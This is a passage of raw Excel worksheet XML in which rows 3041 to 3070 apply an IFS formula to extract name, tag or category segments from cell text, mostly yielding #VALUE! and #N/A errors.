    ISNUMBER(FIND("name=",$A3041)), MID($A3041, FIND("name=",$A3041) + 5, LEN($A3041) - FIND("name=",$A3041)),
    ISNUMBER(FIND("tag/",$A3041)), MID($A3041, FIND("tag/",$A3041) + 4, LEN($A3041) - FIND("tag/",$A3041)),
    ISNUMBER(FIND("category",$A3041)), MID($A3041, FIND("category",$A3041) + 9, LEN($A3041) - FIND("category",$A3041)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3041" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3042" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3042" t="s">
        <v>2612</v>
      </c>
      <c r="B3042" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3042" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3042" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3042" t="e" cm="1">
        <f t="array" ref="E3042">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3042)), MID($A3042, FIND("name=",$A3042) + 5, LEN($A3042) - FIND("name=",$A3042)),
    ISNUMBER(FIND("tag/",$A3042)), MID($A3042, FIND("tag/",$A3042) + 4, LEN($A3042) - FIND("tag/",$A3042)),
    ISNUMBER(FIND("category",$A3042)), MID($A3042, FIND("category",$A3042) + 9, LEN($A3042) - FIND("category",$A3042)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3042" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3043" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3043" t="s">
        <v>2613</v>
      </c>
      <c r="B3043" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3043" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3043" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3043" t="e" cm="1">
        <f t="array" ref="E3043">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3043)), MID($A3043, FIND("name=",$A3043) + 5, LEN($A3043) - FIND("name=",$A3043)),
    ISNUMBER(FIND("tag/",$A3043)), MID($A3043, FIND("tag/",$A3043) + 4, LEN($A3043) - FIND("tag/",$A3043)),
    ISNUMBER(FIND("category",$A3043)), MID($A3043, FIND("category",$A3043) + 9, LEN($A3043) - FIND("category",$A3043)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3043" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3044" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3044" t="s">
        <v>2614</v>
      </c>
      <c r="B3044" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3044" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3044" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3044" t="e" cm="1">
        <f t="array" ref="E3044">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3044)), MID($A3044, FIND("name=",$A3044) + 5, LEN($A3044) - FIND("name=",$A3044)),
    ISNUMBER(FIND("tag/",$A3044)), MID($A3044, FIND("tag/",$A3044) + 4, LEN($A3044) - FIND("tag/",$A3044)),
    ISNUMBER(FIND("category",$A3044)), MID($A3044, FIND("category",$A3044) + 9, LEN($A3044) - FIND("category",$A3044)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3044" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3045" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3045" t="s">
        <v>2613</v>
      </c>
      <c r="B3045" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3045" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3045" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3045" t="e" cm="1">
        <f t="array" ref="E3045">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3045)), MID($A3045, FIND("name=",$A3045) + 5, LEN($A3045) - FIND("name=",$A3045)),
    ISNUMBER(FIND("tag/",$A3045)), MID($A3045, FIND("tag/",$A3045) + 4, LEN($A3045) - FIND("tag/",$A3045)),
    ISNUMBER(FIND("category",$A3045)), MID($A3045, FIND("category",$A3045) + 9, LEN($A3045) - FIND("category",$A3045)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3045" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3046" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3046" t="s">
        <v>2615</v>
      </c>
      <c r="B3046" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3046" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3046" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3046" t="e" cm="1">
        <f t="array" ref="E3046">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3046)), MID($A3046, FIND("name=",$A3046) + 5, LEN($A3046) - FIND("name=",$A3046)),
    ISNUMBER(FIND("tag/",$A3046)), MID($A3046, FIND("tag/",$A3046) + 4, LEN($A3046) - FIND("tag/",$A3046)),
    ISNUMBER(FIND("category",$A3046)), MID($A3046, FIND("category",$A3046) + 9, LEN($A3046) - FIND("category",$A3046)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3046" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3047" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3047" t="s">
        <v>2616</v>
      </c>
      <c r="B3047" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3047" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3047" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3047" t="e" cm="1">
        <f t="array" ref="E3047">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3047)), MID($A3047, FIND("name=",$A3047) + 5, LEN($A3047) - FIND("name=",$A3047)),
    ISNUMBER(FIND("tag/",$A3047)), MID($A3047, FIND("tag/",$A3047) + 4, LEN($A3047) - FIND("tag/",$A3047)),
    ISNUMBER(FIND("category",$A3047)), MID($A3047, FIND("category",$A3047) + 9, LEN($A3047) - FIND("category",$A3047)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3047" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3048" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3048" t="s">
        <v>2617</v>
      </c>
      <c r="B3048" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3048" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3048" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3048" t="e" cm="1">
        <f t="array" ref="E3048">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3048)), MID($A3048, FIND("name=",$A3048) + 5, LEN($A3048) - FIND("name=",$A3048)),
    ISNUMBER(FIND("tag/",$A3048)), MID($A3048, FIND("tag/",$A3048) + 4, LEN($A3048) - FIND("tag/",$A3048)),
    ISNUMBER(FIND("category",$A3048)), MID($A3048, FIND("category",$A3048) + 9, LEN($A3048) - FIND("category",$A3048)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3048" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3049" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3049" t="s">
        <v>2618</v>
      </c>
      <c r="B3049" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3049" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3049" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3049" t="e" cm="1">
        <f t="array" ref="E3049">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3049)), MID($A3049, FIND("name=",$A3049) + 5, LEN($A3049) - FIND("name=",$A3049)),
    ISNUMBER(FIND("tag/",$A3049)), MID($A3049, FIND("tag/",$A3049) + 4, LEN($A3049) - FIND("tag/",$A3049)),
    ISNUMBER(FIND("category",$A3049)), MID($A3049, FIND("category",$A3049) + 9, LEN($A3049) - FIND("category",$A3049)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3049" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3050" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3050" t="s">
        <v>2620</v>
      </c>
      <c r="B3050" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3050" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3050" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3050" t="e" cm="1">
        <f t="array" ref="E3050">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3050)), MID($A3050, FIND("name=",$A3050) + 5, LEN($A3050) - FIND("name=",$A3050)),
    ISNUMBER(FIND("tag/",$A3050)), MID($A3050, FIND("tag/",$A3050) + 4, LEN($A3050) - FIND("tag/",$A3050)),
    ISNUMBER(FIND("category",$A3050)), MID($A3050, FIND("category",$A3050) + 9, LEN($A3050) - FIND("category",$A3050)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3050" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3051" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3051" t="s">
        <v>2621</v>
      </c>
      <c r="B3051" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3051" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3051" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3051" t="e" cm="1">
        <f t="array" ref="E3051">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3051)), MID($A3051, FIND("name=",$A3051) + 5, LEN($A3051) - FIND("name=",$A3051)),
    ISNUMBER(FIND("tag/",$A3051)), MID($A3051, FIND("tag/",$A3051) + 4, LEN($A3051) - FIND("tag/",$A3051)),
    ISNUMBER(FIND("category",$A3051)), MID($A3051, FIND("category",$A3051) + 9, LEN($A3051) - FIND("category",$A3051)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3051" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3052" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3052" t="s">
        <v>2622</v>
      </c>
      <c r="B3052" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3052" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3052" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3052" t="e" cm="1">
        <f t="array" ref="E3052">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3052)), MID($A3052, FIND("name=",$A3052) + 5, LEN($A3052) - FIND("name=",$A3052)),
    ISNUMBER(FIND("tag/",$A3052)), MID($A3052, FIND("tag/",$A3052) + 4, LEN($A3052) - FIND("tag/",$A3052)),
    ISNUMBER(FIND("category",$A3052)), MID($A3052, FIND("category",$A3052) + 9, LEN($A3052) - FIND("category",$A3052)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3052" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3053" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3053" t="s">
        <v>2623</v>
      </c>
      <c r="B3053" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3053" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3053" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3053" t="e" cm="1">
        <f t="array" ref="E3053">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3053)), MID($A3053, FIND("name=",$A3053) + 5, LEN($A3053) - FIND("name=",$A3053)),
    ISNUMBER(FIND("tag/",$A3053)), MID($A3053, FIND("tag/",$A3053) + 4, LEN($A3053) - FIND("tag/",$A3053)),
    ISNUMBER(FIND("category",$A3053)), MID($A3053, FIND("category",$A3053) + 9, LEN($A3053) - FIND("category",$A3053)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3053" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3054" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3054" t="s">
        <v>2624</v>
      </c>
      <c r="B3054" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3054" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3054" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3054" t="e" cm="1">
        <f t="array" ref="E3054">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3054)), MID($A3054, FIND("name=",$A3054) + 5, LEN($A3054) - FIND("name=",$A3054)),
    ISNUMBER(FIND("tag/",$A3054)), MID($A3054, FIND("tag/",$A3054) + 4, LEN($A3054) - FIND("tag/",$A3054)),
    ISNUMBER(FIND("category",$A3054)), MID($A3054, FIND("category",$A3054) + 9, LEN($A3054) - FIND("category",$A3054)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3054" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3055" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3055" t="s">
        <v>2625</v>
      </c>
      <c r="B3055" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3055" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3055" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3055" t="e" cm="1">
        <f t="array" ref="E3055">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3055)), MID($A3055, FIND("name=",$A3055) + 5, LEN($A3055) - FIND("name=",$A3055)),
    ISNUMBER(FIND("tag/",$A3055)), MID($A3055, FIND("tag/",$A3055) + 4, LEN($A3055) - FIND("tag/",$A3055)),
    ISNUMBER(FIND("category",$A3055)), MID($A3055, FIND("category",$A3055) + 9, LEN($A3055) - FIND("category",$A3055)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3055" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3056" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3056" t="s">
        <v>2626</v>
      </c>
      <c r="B3056" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3056" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3056" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3056" t="e" cm="1">
        <f t="array" ref="E3056">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3056)), MID($A3056, FIND("name=",$A3056) + 5, LEN($A3056) - FIND("name=",$A3056)),
    ISNUMBER(FIND("tag/",$A3056)), MID($A3056, FIND("tag/",$A3056) + 4, LEN($A3056) - FIND("tag/",$A3056)),
    ISNUMBER(FIND("category",$A3056)), MID($A3056, FIND("category",$A3056) + 9, LEN($A3056) - FIND("category",$A3056)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3056" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3057" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3057" t="s">
        <v>2627</v>
      </c>
      <c r="B3057" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3057" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3057" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3057" t="e" cm="1">
        <f t="array" ref="E3057">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3057)), MID($A3057, FIND("name=",$A3057) + 5, LEN($A3057) - FIND("name=",$A3057)),
    ISNUMBER(FIND("tag/",$A3057)), MID($A3057, FIND("tag/",$A3057) + 4, LEN($A3057) - FIND("tag/",$A3057)),
    ISNUMBER(FIND("category",$A3057)), MID($A3057, FIND("category",$A3057) + 9, LEN($A3057) - FIND("category",$A3057)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3057" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3058" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3058" t="s">
        <v>2628</v>
      </c>
      <c r="B3058" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3058" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3058" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3058" t="e" cm="1">
        <f t="array" ref="E3058">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3058)), MID($A3058, FIND("name=",$A3058) + 5, LEN($A3058) - FIND("name=",$A3058)),
    ISNUMBER(FIND("tag/",$A3058)), MID($A3058, FIND("tag/",$A3058) + 4, LEN($A3058) - FIND("tag/",$A3058)),
    ISNUMBER(FIND("category",$A3058)), MID($A3058, FIND("category",$A3058) + 9, LEN($A3058) - FIND("category",$A3058)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3058" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3059" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3059" t="s">
        <v>2629</v>
      </c>
      <c r="B3059" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3059" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3059" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3059" t="e" cm="1">
        <f t="array" ref="E3059">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3059)), MID($A3059, FIND("name=",$A3059) + 5, LEN($A3059) - FIND("name=",$A3059)),
    ISNUMBER(FIND("tag/",$A3059)), MID($A3059, FIND("tag/",$A3059) + 4, LEN($A3059) - FIND("tag/",$A3059)),
    ISNUMBER(FIND("category",$A3059)), MID($A3059, FIND("category",$A3059) + 9, LEN($A3059) - FIND("category",$A3059)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3059" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3060" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3060" t="s">
        <v>2630</v>
      </c>
      <c r="B3060" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3060" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3060" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3060" t="e" cm="1">
        <f t="array" ref="E3060">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3060)), MID($A3060, FIND("name=",$A3060) + 5, LEN($A3060) - FIND("name=",$A3060)),
    ISNUMBER(FIND("tag/",$A3060)), MID($A3060, FIND("tag/",$A3060) + 4, LEN($A3060) - FIND("tag/",$A3060)),
    ISNUMBER(FIND("category",$A3060)), MID($A3060, FIND("category",$A3060) + 9, LEN($A3060) - FIND("category",$A3060)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3060" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3061" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3061" t="s">
        <v>2631</v>
      </c>
      <c r="B3061" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3061" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3061" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3061" t="e" cm="1">
        <f t="array" ref="E3061">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3061)), MID($A3061, FIND("name=",$A3061) + 5, LEN($A3061) - FIND("name=",$A3061)),
    ISNUMBER(FIND("tag/",$A3061)), MID($A3061, FIND("tag/",$A3061) + 4, LEN($A3061) - FIND("tag/",$A3061)),
    ISNUMBER(FIND("category",$A3061)), MID($A3061, FIND("category",$A3061) + 9, LEN($A3061) - FIND("category",$A3061)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3061" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3062" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3062" t="s">
        <v>2632</v>
      </c>
      <c r="B3062" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3062" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3062" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3062" t="e" cm="1">
        <f t="array" ref="E3062">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3062)), MID($A3062, FIND("name=",$A3062) + 5, LEN($A3062) - FIND("name=",$A3062)),
    ISNUMBER(FIND("tag/",$A3062)), MID($A3062, FIND("tag/",$A3062) + 4, LEN($A3062) - FIND("tag/",$A3062)),
    ISNUMBER(FIND("category",$A3062)), MID($A3062, FIND("category",$A3062) + 9, LEN($A3062) - FIND("category",$A3062)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3062" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3063" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3063" t="s">
        <v>2633</v>
      </c>
      <c r="B3063" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3063" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3063" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3063" t="e" cm="1">
        <f t="array" ref="E3063">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3063)), MID($A3063, FIND("name=",$A3063) + 5, LEN($A3063) - FIND("name=",$A3063)),
    ISNUMBER(FIND("tag/",$A3063)), MID($A3063, FIND("tag/",$A3063) + 4, LEN($A3063) - FIND("tag/",$A3063)),
    ISNUMBER(FIND("category",$A3063)), MID($A3063, FIND("category",$A3063) + 9, LEN($A3063) - FIND("category",$A3063)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3063" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3064" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3064" t="s">
        <v>2634</v>
      </c>
      <c r="B3064" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3064" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3064" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3064" t="e" cm="1">
        <f t="array" ref="E3064">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3064)), MID($A3064, FIND("name=",$A3064) + 5, LEN($A3064) - FIND("name=",$A3064)),
    ISNUMBER(FIND("tag/",$A3064)), MID($A3064, FIND("tag/",$A3064) + 4, LEN($A3064) - FIND("tag/",$A3064)),
    ISNUMBER(FIND("category",$A3064)), MID($A3064, FIND("category",$A3064) + 9, LEN($A3064) - FIND("category",$A3064)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3064" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3065" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3065" t="s">
        <v>2635</v>
      </c>
      <c r="B3065" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3065" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3065" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3065" t="e" cm="1">
        <f t="array" ref="E3065">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3065)), MID($A3065, FIND("name=",$A3065) + 5, LEN($A3065) - FIND("name=",$A3065)),
    ISNUMBER(FIND("tag/",$A3065)), MID($A3065, FIND("tag/",$A3065) + 4, LEN($A3065) - FIND("tag/",$A3065)),
    ISNUMBER(FIND("category",$A3065)), MID($A3065, FIND("category",$A3065) + 9, LEN($A3065) - FIND("category",$A3065)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3065" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3066" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3066" t="s">
        <v>2636</v>
      </c>
      <c r="B3066" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3066" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3066" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3066" t="e" cm="1">
        <f t="array" ref="E3066">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3066)), MID($A3066, FIND("name=",$A3066) + 5, LEN($A3066) - FIND("name=",$A3066)),
    ISNUMBER(FIND("tag/",$A3066)), MID($A3066, FIND("tag/",$A3066) + 4, LEN($A3066) - FIND("tag/",$A3066)),
    ISNUMBER(FIND("category",$A3066)), MID($A3066, FIND("category",$A3066) + 9, LEN($A3066) - FIND("category",$A3066)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3066" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3067" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3067" t="s">
        <v>2637</v>
      </c>
      <c r="B3067" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3067" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3067" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3067" t="e" cm="1">
        <f t="array" ref="E3067">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3067)), MID($A3067, FIND("name=",$A3067) + 5, LEN($A3067) - FIND("name=",$A3067)),
    ISNUMBER(FIND("tag/",$A3067)), MID($A3067, FIND("tag/",$A3067) + 4, LEN($A3067) - FIND("tag/",$A3067)),
    ISNUMBER(FIND("category",$A3067)), MID($A3067, FIND("category",$A3067) + 9, LEN($A3067) - FIND("category",$A3067)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3067" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3068" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3068" t="s">
        <v>2638</v>
      </c>
      <c r="B3068" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3068" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3068" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3068" t="e" cm="1">
        <f t="array" ref="E3068">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3068)), MID($A3068, FIND("name=",$A3068) + 5, LEN($A3068) - FIND("name=",$A3068)),
    ISNUMBER(FIND("tag/",$A3068)), MID($A3068, FIND("tag/",$A3068) + 4, LEN($A3068) - FIND("tag/",$A3068)),
    ISNUMBER(FIND("category",$A3068)), MID($A3068, FIND("category",$A3068) + 9, LEN($A3068) - FIND("category",$A3068)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3068" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3069" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3069" t="s">
        <v>2639</v>
      </c>
      <c r="B3069" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3069" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3069" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3069" t="e" cm="1">
        <f t="array" ref="E3069">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3069)), MID($A3069, FIND("name=",$A3069) + 5, LEN($A3069) - FIND("name=",$A3069)),
    ISNUMBER(FIND("tag/",$A3069)), MID($A3069, FIND("tag/",$A3069) + 4, LEN($A3069) - FIND("tag/",$A3069)),
    ISNUMBER(FIND("category",$A3069)), MID($A3069, FIND("category",$A3069) + 9, LEN($A3069) - FIND("category",$A3069)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3069" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3070" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3070" t="s">
        <v>2640</v>
      </c>
      <c r="B3070" t="e">
        <f t="shared" si="142"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3070" t="e">
        <f t="shared" si="143"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3070" t="e">
        <f t="shared" si="144"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3070" t="e" cm="1">
        <f t="array" ref="E3070">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3070)), MID($A3070, FIND("name=",$A3070) + 5, LEN($A3070) - FIND("name=",$A3070)),
    ISNUMBER(FIND("tag/",$A3070)), MID($A3070, FIND("tag/",$A3070) + 4, LEN($A3070) - FIND("tag/",$A3070)),
    ISNUMBER(FIND("category",$A3070)), MID($A3070, FIND("category",$A3070) + 9, LEN($A3070) - FIND("category",$A3070)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3070" t="e">
        <v>#N/A</v>
      </c>
    </row>
